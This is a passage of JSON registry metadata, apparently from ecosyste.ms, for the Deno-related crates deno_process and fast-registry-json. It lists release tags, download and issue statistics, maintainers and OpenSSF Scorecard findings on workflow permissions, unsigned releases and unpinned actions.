1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-08T15:20:51.790Z","dependent_packages_count":0,"downloads":147436,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":95.35171702115461,"dependent_repos_count":23.617496990196642,"dependent_packages_count":31.33520609986814,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":50.10147337040647},"purl":"pkg:cargo/deno_process","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_process","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_process","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_process/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-07T13:25:49.747Z","issues_count":6659,"pull_requests_count":9671,"avg_time_to_close_issue":17134708.21400472,"avg_time_to_close_pull_request":1530358.8397069778,"issues_closed_count":3811,"pull_requests_closed_count":8053,"pull_request_authors_count":591,"issue_authors_count":2494,"avg_comments_per_issue":2.5029283676227663,"avg_comments_per_pull_request":0.7209182090786889,"merged_pull_requests_count":7031,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":681,"past_year_pull_requests_count":1194,"past_year_avg_time_to_close_issue":1348806.688034188,"past_year_avg_time_to_close_pull_request":1303670.810240964,"past_year_issues_closed_count":234,"past_year_pull_requests_closed_count":664,"past_year_pull_request_authors_count":193,"past_year_issue_authors_count":377,"past_year_avg_comments_per_issue":1.234948604992658,"past_year_avg_comments_per_pull_request":1.134003350083752,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":497,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":396,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_process/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_process/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_process/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_process/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_process/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_process/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2025-01-15T11:36:50.040Z","updated_at":"2025-01-15T11:36:50.040Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2025-01-19T09:43:05.303Z","updated_at":"2025-01-19T09:43:05.303Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":14712069,"name":"fast-registry-json","ecosystem":"cargo","description":"SIMD-accelerated JSON scanner for indexing npm registry packuments","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":2,"first_release_published_at":"2026-07-03T09:48:25.535Z","latest_release_published_at":"2026-07-08T11:14:03.845Z","latest_release_number":"0.2.0","last_synced_at":"2026-09-07T23:00:53.763Z","created_at":"2026-07-03T12:34:50.252Z","updated_at":"2026-09-08T15:41:39.902Z","registry_url":"https://crates.io/crates/fast-registry-json/","install_command":"cargo install fast-registry-json","documentation_url":"https://docs.rs/fast-registry-json/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: 